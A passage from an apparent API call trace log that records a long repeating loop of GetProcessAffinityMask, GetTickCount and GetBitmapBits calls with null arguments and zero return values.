hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.265] GetTickCount () returned 0x202a4b7 [0252.265] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.266] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.266] GetTickCount () returned 0x202a4b7 [0252.266] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.266] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.266] GetTickCount () returned 0x202a4b7 [0252.266] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.266] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.266] GetTickCount () returned 0x202a4b7 [0252.266] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.266] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.266] GetTickCount () returned 0x202a4b7 [0252.266] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.266] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.266] GetTickCount () returned 0x202a4b7 [0252.266] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.266] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.266] GetTickCount () returned 0x202a4b7 [0252.266] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.266] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.266] GetTickCount () returned 0x202a4b7 [0252.266] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.267] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.267] GetTickCount () returned 0x202a4b7 [0252.267] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.267] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.267] GetTickCount () returned 0x202a4b7 [0252.267] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.267] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.267] GetTickCount () returned 0x202a4b7 [0252.267] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.267] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.267] GetTickCount () returned 0x202a4b7 [0252.267] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.267] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.267] GetTickCount () returned 0x202a4b7 [0252.267] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.267] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.267] GetTickCount () returned 0x202a4b7 [0252.267] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.267] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.267] GetTickCount () returned 0x202a4b7 [0252.267] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.267] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.267] GetTickCount () returned 0x202a4b7 [0252.267] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.267] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.268] GetTickCount () returned 0x202a4b7 [0252.268] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.268] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.268] GetTickCount () returned 0x202a4b7 [0252.268] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.268] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.268] GetTickCount () returned 0x202a4b7 [0252.268] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.268] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.268] GetTickCount () returned 0x202a4b7 [0252.268] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.268] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.268] GetTickCount () returned 0x202a4b7 [0252.268] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.268] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.268] GetTickCount () returned 0x202a4b7 [0252.268] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.268] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.268] GetTickCount () returned 0x202a4b7 [0252.268] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.269] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.269] GetTickCount () returned 0x202a4b7 [0252.269] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.269] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.269] GetTickCount () returned 0x202a4b7 [0252.269] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.269] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.269] GetTickCount () returned 0x202a4b7 [0252.269] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.269] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.269] GetTickCount () returned 0x202a4b7 [0252.269] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.269] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.269] GetTickCount () returned 0x202a4b7 [0252.269] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.269] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.269] GetTickCount () returned 0x202a4b7 [0252.269] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.269] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.269] GetTickCount () returned 0x202a4b7 [0252.269] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.269] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.270] GetTickCount () returned 0x202a4b7 [0252.270] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.270] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.270] GetTickCount () returned 0x202a4b7 [0252.270] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.270] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.270] GetTickCount () returned 0x202a4b7 [0252.270] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.270] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.270] GetTickCount () returned 0x202a4b7 [0252.270] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.270] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.270] GetTickCount () returned 0x202a4b7 [0252.270] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.270] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.270] GetTickCount () returned 0x202a4b7 [0252.270] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.270] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.270] GetTickCount () returned 0x202a4b7 [0252.270] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.270] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.270] GetTickCount () returned 0x202a4b7 [0252.270] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.270] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.271] GetTickCount () returned 0x202a4b7 [0252.271] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.271] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.271] GetTickCount () returned 0x202a4b7 [0252.271] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.271] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.271] GetTickCount () returned 0x202a4b7 [0252.271] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.271] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.271] GetTickCount () returned 0x202a4b7 [0252.271] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.271] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.271] GetTickCount () returned 0x202a4b7 [0252.271] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.271] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.271] GetTickCount () returned 0x202a4b7 [0252.271] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.271] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.271] GetTickCount () returned 0x202a4b7 [0252.271] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.271] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.271] GetTickCount () returned 0x202a4b7 [0252.271] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.271] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.272] GetTickCount () returned 0x202a4b7 [0252.272] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.272] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.272] GetTickCount () returned 0x202a4b7 [0252.272] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.272] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.272] GetTickCount () returned 0x202a4b7 [0252.272] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.272] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.272] GetTickCount () returned 0x202a4c7 [0252.272] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.272] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.272] GetTickCount () returned 0x202a4c7 [0252.272] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.272] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.272] GetTickCount () returned 0x202a4c7 [0252.272] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.272] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.272] GetTickCount () returned 0x202a4c7 [0252.272] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.272] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.272] GetTickCount () returned 0x202a4c7 [0252.272] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.272] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.272] GetTickCount () returned 0x202a4c7 [0252.273] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.273] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.273] GetTickCount () returned 0x202a4c7 [0252.273] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.273] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.273] GetTickCount () returned 0x202a4c7 [0252.273] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.273] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.273] GetTickCount () returned 0x202a4c7 [0252.273] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.273] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.273] GetTickCount () returned 0x202a4c7 [0252.273] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.273] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.273] GetTickCount () returned 0x202a4c7 [0252.273] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.273] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.273] GetTickCount () returned 0x202a4c7 [0252.273] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.273] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.273] GetTickCount () returned 0x202a4c7 [0252.273] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.273] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.273] GetTickCount () returned 0x202a4c7 [0252.273] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.274] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.274] GetTickCount () returned 0x202a4c7 [0252.274] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.274] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.274] GetTickCount () returned 0x202a4c7 [0252.274] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.274] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.274] GetTickCount () returned 0x202a4c7 [0252.274] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.274] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.274] GetTickCount () returned 0x202a4c7 [0252.274] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.274] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.274] GetTickCount () returned 0x202a4c7 [0252.274] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.274] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.274] GetTickCount () returned 0x202a4c7 [0252.274] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.274] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.274] GetTickCount () returned 0x202a4c7 [0252.274] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.275] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.275] GetTickCount () returned 0x202a4c7 [0252.275] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.275] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.275] GetTickCount () returned 0x202a4c7 [0252.275] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.275] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.275] GetTickCount () returned 0x202a4c7 [0252.275] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.275] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.275] GetTickCount () returned 0x202a4c7 [0252.275] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.275] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.275] GetTickCount () returned 0x202a4c7 [0252.275] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.275] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.275] GetTickCount () returned 0x202a4c7 [0252.275] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.275] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.275] GetTickCount () returned 0x202a4c7 [0252.275] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.276] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.276] GetTickCount () returned 0x202a4c7 [0252.276] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.276] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.276] GetTickCount () returned 0x202a4c7 [0252.276] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.276] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.276] GetTickCount () returned 0x202a4c7 [0252.276] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.276] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.276] GetTickCount () returned 0x202a4c7 [0252.276] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.276] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.276] GetTickCount () returned 0x202a4c7 [0252.276] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.276] 